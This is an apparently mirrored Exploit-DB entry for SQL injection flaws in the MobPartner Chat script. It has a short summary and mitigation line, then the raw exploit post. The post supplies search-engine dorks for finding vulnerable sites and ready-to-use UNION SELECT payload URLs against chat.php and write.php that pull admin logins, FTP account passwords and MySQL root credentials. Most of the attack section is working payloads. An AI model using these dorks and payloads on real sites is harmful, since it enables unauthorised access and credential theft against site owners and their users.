MobPartner Chat Multiple Sql Injection Vulnerability

vendor:

Chat

by:

AtT4CKxT3rR0r1ST

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Chat

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

MobPartner Chat Multiple Sql Injection Vulnerability

MobPartner Chat is vulnerable to multiple SQL Injection vulnerabilities. Attackers can exploit these vulnerabilities to gain access to the admin panel, FTP control panel, and root server. Attackers can use the 'null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users--' payload to gain access to the admin panel, 'null+and+1=2+union+select+1,concat(user,0x3a,password),3,4,5,6+from+pureftpd.ftpd--' payload to gain access to the FTP control panel, and 'null+and+1=2+union+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6+from+mysql.user--' payload to gain access to the root server.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

MobPartner Chat  Multiple Sql Injection Vulnerability
============================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Team           : Sec Attack Team
.:. Home           : www.sec-attack.com/vb
.:. Script         : MobPartner
.:. Download Script: http://www.mobpartner.com/services/chat/?wsid=32174
.:. Bug Type       : Sql Injection [Mysql]
.:. Dork           : [1]"Powered by MobPartner" inurl:"chat.php"
                       [2]"Powered by MobPartner" inurl:"write.php"
####################################################################

===[ Exploit ]===

www.site.com/chat.php?id=[SQL INJECTION]
www.site.com/write.php?id=[SQL INJECTION]

********************************************************************
 T0 Get Username & Password Admin Site

[Sql Injection ; {Username & password Admin}]

www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users--
www.site.com/write.php?id=null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users--


********************************************************************
 T0 Get Username & Password FTP Control Panel

[Sql Injection ; {Username & Password FTP Control Panel}]

www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(user,0x3a,password),3,4,5,6+from+pureftpd.ftpd--
www.site.com/write.php?id=null+and+1=2+union+select+1,concat(user,0x3a,password),3,4,5,6+from+pureftpd.ftpd--


********************************************************************
 T0 Get Username & Password Root Server

[Sql Injection ; {Username & Password Root Server}]

www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6+from+mysql.user--
www.site.com/write.php?id=null+and+1=2+union+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6+from+mysql.user--

####################################################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack